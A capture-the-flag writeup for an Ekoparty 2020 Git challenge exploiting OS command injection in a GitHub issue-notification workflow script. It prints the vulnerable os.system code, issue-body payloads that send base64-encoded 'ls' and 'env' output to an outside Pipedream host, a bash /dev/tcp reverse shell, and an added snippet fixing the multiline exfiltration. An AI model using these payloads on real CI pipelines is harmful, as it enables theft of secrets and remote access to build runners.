
Challenge Data

  • Name: Env
  • Category: Git
  • Points: 443/500

Solution

(continuation of challenge DOCS)

Unfortunately, by the time I wrote this writeup, both repositories were no longer available.

We had a new repository to inspect. I first tried to inspect the different commits, but there was only one. Again, the .github directory, with some workflows in it, was present. This time the files were named issue-notify.(yaml|py).

The .yaml file had nothing interesting, but the Python script did:

import os
import uuid
from os import getenv

# Assumed to be PyGithub (the only common library exposing a Github(token) client).
from github import Github

def issue_notify(title, body, repo):
    # just echo the body into the report repo at /tmp and our scraper script will pick them up and mail them out to staff@
    notify_id = str(uuid.uuid4())
    # only notify on very important issues to reduce spam!
    if 'very important' in title:
        # body is pasted straight into a shell command line: OS command injection
        os.system('echo "%s" > /tmp/%s' % (body, notify_id))
    return

def run():
    # ISSUE_TITLE and ISSUE_BODY are populated by the workflow from the submitted issue
    issue_notify(getenv('ISSUE_TITLE'), getenv('ISSUE_BODY'), Github(getenv('REPORT_TOKEN')))
    return

Each time a new issue (bounced from the public repo) arrived, the run() function was executed. As you can see, there is a clear OS command injection in the issue_notify function: the command line passed to os.system is built from the body variable, which is filled with the content of the body of the submitted issue, without any quoting or escaping. Furthermore, for that line to execute at all, the title of the issue must contain the string "very important" (a substring check, so any title containing it works).

I went to http://github.com/ekoparty2020/ekolabs and started submitting issues with:

  • Title: very important
  • Body: asd" ; #COMMAND_TO_EXECUTE; echo "asd

I used Pipedream in order to check whether I was receiving any kind of connection from the server. These were my attempts:

  1. Ensure it was working. Body:

     asd" ; wget https://b9d850e1b49fcdfa12f3c7eb20d3c3e8.m.pipedream.net; echo "asd

     The GET arrived!!

  2. Execute an 'ls'. Body:

     asd"; wget -X POST https://b9d850e1b49fcdfa12f3c7eb20d3c3e8.m.pipedream.net --post-data=`echo \`ls\` | base64`; echo "asd

     The data arrived! But the information wasn't useful.

  3. Execute an "env". Because of the name of the challenge, I thought that the flag could be inside the environment variables. Body:

     asd"; wget -X POST https://b9d850e1b49fcdfa12f3c7eb20d3c3e8.m.pipedream.net --post-data=`echo \`env\` | base64`; echo "asd

     The data arrived but was just one value. I didn't realise at this point what was happening (I'll come back to this later).

  4. Execute a reverse shell. Body:

     asd"; bash -c "/bin/bash -i >& /dev/tcp/<host>/56894 0>&1"; echo "asd

     This worked. Once inside, I just executed the 'env' command and the flag was there!

I didn't want to execute a reverse shell because I was sure that the env command should have worked. Later I realized that it didn't work because the output was multiline. Most probably, if I had used a tr -d '\n' before encoding it to base64, it would have worked.
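As an added example that is not part of the original writeup, the following shell snippet reproduces offline why attempt 3 delivered only one value. The sample_env function is a constructed stand-in for the real env output, and the snippet assumes GNU coreutils base64, which wraps its output at 76 columns. An unquoted command substitution word-splits that wrapped output, so only the first line stays attached to --post-data= and the remaining lines become extra arguments to wget. Removing the newlines after the base64 step (or using base64 -w0) keeps the whole encoding in one argument, and the receiving side can decode it back:

```sh
#!/bin/sh
# Constructed stand-in for `env` on the runner; values are not from the challenge.
sample_env() {
    printf 'PATH=/usr/local/bin:/usr/bin:/bin\n'
    printf 'HOME=/home/runner\n'
    printf 'ISSUE_TITLE=very important\n'
    printf 'FLAG=EKO{constructed-sample-value-not-the-real-flag}\n'
}

# Report how many separate words the shell handed us.
count_words() { echo "$#"; }

# The writeup's form: echo `env` | base64. The inner unquoted substitution turns
# env's newlines into spaces, but base64 then re-wraps its output at 76 columns,
# so the outer substitution yields several words. In the real payload only the
# first word stays glued to --post-data=; the rest are parsed as stray URLs.
words_in_broken_encoding() {
    count_words $(echo $(sample_env) | base64)
}

# Fix: strip newlines AFTER base64, because that is where they are introduced.
# base64 -w0 does the same on GNU coreutils; tr -d '\n' also works elsewhere.
fixed_encoding() {
    sample_env | base64 | tr -d '\n'
}

words_in_fixed_encoding() {
    count_words $(fixed_encoding)
}

# Receiving side: decode the captured POST body back into env lines.
decode_exfil() {
    printf '%s' "$1" | base64 -d
}

# Round trip: does the decoded body match the original listing?
roundtrip_ok() {
    if [ "$(decode_exfil "$(fixed_encoding)")" = "$(sample_env)" ]; then
        echo yes
    else
        echo no
    fi
}

echo "words in broken encoding: $(words_in_broken_encoding)"
echo "words in fixed encoding:  $(words_in_fixed_encoding)"
echo "round trip ok:            $(roundtrip_ok)"
```

The same word-splitting explains why the ls exfil in attempt 2 happened to work: a short listing fits in a single 76-column base64 line, while the env listing does not.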